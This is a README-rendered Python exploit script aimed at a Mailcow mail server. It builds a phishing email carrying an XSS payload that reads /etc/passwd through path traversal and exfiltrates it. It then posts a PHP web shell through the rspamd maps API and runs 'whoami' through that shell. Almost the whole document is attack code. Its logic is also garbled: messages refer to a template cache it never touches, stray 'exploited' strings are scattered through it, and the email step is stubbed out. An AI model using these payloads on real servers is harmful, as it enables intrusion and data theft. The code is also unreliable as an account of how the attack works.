README.md
Rendering markdown...
import requests
import json
import base64
target_url = input("Enter the target Mailcow instance URL (e.g., https://mail.mailcow.example): ")
xss_payload = "<script>fetch('/json_api.php?query[]=../etc/passwd').then(r => r.text()).then(t => fetch('/json_api.php?query[]=../rspamd_custom_maps/'+btoa(t)))</script>"
malicious_email = f"""
<div id=a>
<a href="{target_url}/json_api.php?query[]={xss_payload}">Read important admin message here.</a>
</div>
<style>
#a {{ background: url("{target_url}/json_api.php?query[]={xss_payload}") }}
</style>
"""
rspamd_maps_endpoint = f"{target_url}/json_api.php?action=rspamd_maps"
malicious_map_data = {
"map": ["../etc/passwd"],
"rspamd_map_data": "<?php system($_GET['cmd']); ?>"
}
encoded_map_data = base64.b64encode(json.dumps(malicious_map_data).encode()).decode()
malicious_api_request = {
"action": "rspamd_maps",
"data": encoded_map_data
}
try:
print("Sending malicious email...")
#... send email logic...
print("Waiting for victim to open email...")
print("Sending malicious API request...")
response = requests.post(rspamd_maps_endpoint, data=malicious_api_request)
print("Response Status Code:", response.status_code)
print("Response Text:123", response.text)
if response.status_code == 200:
print("Template cache overwritten successfully!")
else:
print("Error overwriting template cache:", response.text)
print("Triggering malicious code execution...")
response = requests.get(f"{target_url}/json_api.php?cmd=whoami")
print("Response Status Code:", response.status_code)
print("Response Text:exploited", response.text)
if response.status_code == 200:
print("Malicious code executed successfully!")
print("Command output:exploited", response.text)
else:
print("Error executing malicious code:", response.text)
except requests.exceptions.RequestException as e:
print("Error sending request:exploited", e)
except Exception as e:
print("Error:", e)